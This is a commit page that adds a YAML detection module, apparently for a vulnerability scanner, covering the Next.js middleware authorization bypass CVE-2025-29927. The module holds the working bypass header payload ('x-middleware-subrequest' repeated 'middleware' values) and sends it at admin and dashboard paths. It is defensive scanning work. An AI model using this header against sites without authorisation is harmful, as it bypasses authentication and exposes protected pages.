Skip to content

Commit dafc202

Browse files
committed
feat: add vuln module for NextJS middleware bypass CVE-2025-29927 (CISA KEV)
- Sends GET request with x-middleware-subrequest header to detect auth bypass - Targets protected paths: admin, dashboard, api/admin - Matches HTTP 200 + Next.js body signatures - Removed static path to prevent false positives on patched systems - Fixes #1449
1 parent f4c1bbf commit dafc202

1 file changed

Lines changed: 57 additions & 0 deletions

File tree

Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
info:
2+
name: nextjs_cve_2025_29927_vuln
3+
author: Prosper Okah
4+
severity: 9
5+
description: CVE-2025-29927 is an unauthenticated authorization bypass vulnerability in Next.js. The framework uses an internal header x-middleware-subrequest to track recursive middleware calls. In affected versions (prior to 12.3.5, 13.5.9, 14.2.25, 15.2.3), this header is not stripped from incoming external requests, allowing attackers to bypass authentication and access control middleware entirely by setting this header in any HTTP request.
6+
reference:
7+
- https://nvd.nist.gov/vuln/detail/CVE-2025-29927
8+
- https://nextjs.org/blog/cve-2025-29927
9+
- https://github.com/EQSTLab/CVE-2025-29927
10+
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
11+
profiles:
12+
- vuln
13+
- http
14+
- critical_severity
15+
- cve2025
16+
- cve
17+
- nextjs
18+
- auth_bypass
19+
- middleware_bypass
20+
21+
payloads:
22+
- library: http
23+
steps:
24+
- method: get
25+
timeout: 3
26+
headers:
27+
User-Agent: "{user_agent}"
28+
x-middleware-subrequest: "middleware:middleware:middleware:middleware:middleware"
29+
ssl: false
30+
url:
31+
nettacker_fuzzer:
32+
input_format: "{{schema}}://{target}:{{ports}}/{{path}}"
33+
prefix: ""
34+
suffix: ""
35+
interceptors:
36+
data:
37+
path:
38+
- "admin"
39+
- "dashboard"
40+
- "api/admin"
41+
schema:
42+
- "http"
43+
- "https"
44+
ports:
45+
- 80
46+
- 443
47+
- 3000
48+
- 8080
49+
response:
50+
condition_type: and
51+
conditions:
52+
status_code:
53+
regex: '200'
54+
reverse: false
55+
content:
56+
regex: "__NEXT_DATA__|_next/|next/dist"
57+
reverse: false

0 commit comments

Comments
 (0)